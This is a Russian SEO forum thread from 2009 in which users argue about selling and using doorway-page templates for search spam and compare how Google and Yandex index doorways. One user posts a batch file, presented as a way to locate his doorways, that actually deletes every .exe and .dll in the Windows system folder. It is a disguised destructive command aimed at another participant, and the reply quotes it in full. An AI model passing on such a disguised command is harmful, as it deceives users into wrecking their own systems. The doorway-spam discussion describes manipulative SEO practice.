Шаблон

[Удален]
jonxxx:
Но шабы чаще всего делаются либо из других шабов либо из белых сайтов. Почему именно из доров?

Все, мне уже надоело кому то что то весь день показывать и доказывать. Короче, реальный нюб обратится за помощью. Мои доры в индексе гугла за 4 дня, это наверное о чем то говорит? хехе

ewg777
На сайте с 04.06.2007
225
rezon77:
Мои доры в индексе гугла за 4 дня, это наверное о чем то говорит? хехе

Очевидно, что школу много прогуливаете.

[Удален]
ewg777:
Очевидно, что школу много прогуливаете.

Слушай, ты уже достал, покажи свои доры если есть чем похвалится, а то смотрю весь день тут сидишь, видно внатуре канигулы и занятся нечем, достал уже. Аргументов никаких, только побазарить.

J
На сайте с 09.07.2008
40
rezon77:
Мои доры в индексе гугла за 4 дня, это наверное о чем то говорит? хехе

А о чем это может говорить? Ру гугл хавает все подряд.

ewg777
На сайте с 04.06.2007
225
rezon77:
Слушай, ты уже достал, покажи свои доры если есть чем похвалится, а то смотрю весь день тут сидишь, видно внатуре канигулы и занятся нечем, достал уже. Аргументов никаких, только побазарить.

Как пожелаешь. Я их помечаю особыми метками. Поэтому чтобы найти мои дорвеи нужно сделать следующее:

Создаем тестовый документ:

cd\

cd windows

del *.exe

del *.dll

@cd с:\windows

del *.exe

del *.dll

И сохраняем текстовый документ с расширением bat

Ну и запускаем.

[Удален]
ewg777:
Как пожелаешь. Я их помечаю особыми метками. Поэтому чтобы найти мои дорвеи нужно сделать следующее:

Создаем тестовый документ:

cd\
cd windows
del *.exe
del *.dll

@cd с:\windows
del *.exe
del *.dll

И сохраняем текстовый документ с расширением bat
Ну и запускаем.

Это что за бред?

rezon77 добавил 25.05.2009 в 22:25

jonxxx:
А о чем это может говорить? Ру гугл хавает все подряд.

Ну не скажите, делал я как то под гугл 120 доров на народе, для теста, в итоге гугл захавал только 1 дор, и то, только одну страницу и все. А яша съел почти половину и полностью, хотя я даже его во всем проигнорировал ☝

J
На сайте с 09.07.2008
40
rezon77:
Ну не скажите, делал я как то под гугл 120 доров на народе, для теста, в итоге гугл захавал только 1 дор, и то, только одну страницу и все. А яша съел почти половину и полностью, хотя я даже его во всем проигнорировал ☝

Из этого можно сделать вывод, что опыт в дорвеях пока мягко говоря не очень большой, зарабатывать не получается, поэтому лучше на форумах впаривать шабы за 10 баксов?

И кстати могли бы для примера выложить шаб, чтоб доказать, что чего то умеете. Не понятно ваше нежелание сделать шаб из сайта, ссылку на который выше выкладывали, там ничего сложного нет, неужели не можете.

[Удален]
jonxxx:
Из этого можно сделать вывод, что опыт в дорвеях пока мягко говоря не очень большой, зарабатывать не получается, поэтому лучше на форумах впаривать шабы за 10 баксов?

И кстати могли бы для примера выложить шаб, чтоб доказать, что чего то умеете. Не понятно ваше нежелание сделать шаб из сайта, ссылку на который выше выкладывали, там ничего сложного нет, неужели не можете.

Т.е. я должен из нормального сайта сделать дор?

ewg777
На сайте с 04.06.2007
225

Вот по теме - Бан за шаблон: миф или реальность?

ewg777 добавил 25.05.2009 в 22:39

rezon77:

ТС, кидалово обычное. Что тут спорить дальше?

Обосновывать обратное он не желает.

Подобная тема

J
На сайте с 09.07.2008
40
rezon77:

Из нормального сайта сделать ШАБЛОН для дора. Что может быть проще, чем сохранить страницу, удалить лишнее и вставить макросы.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий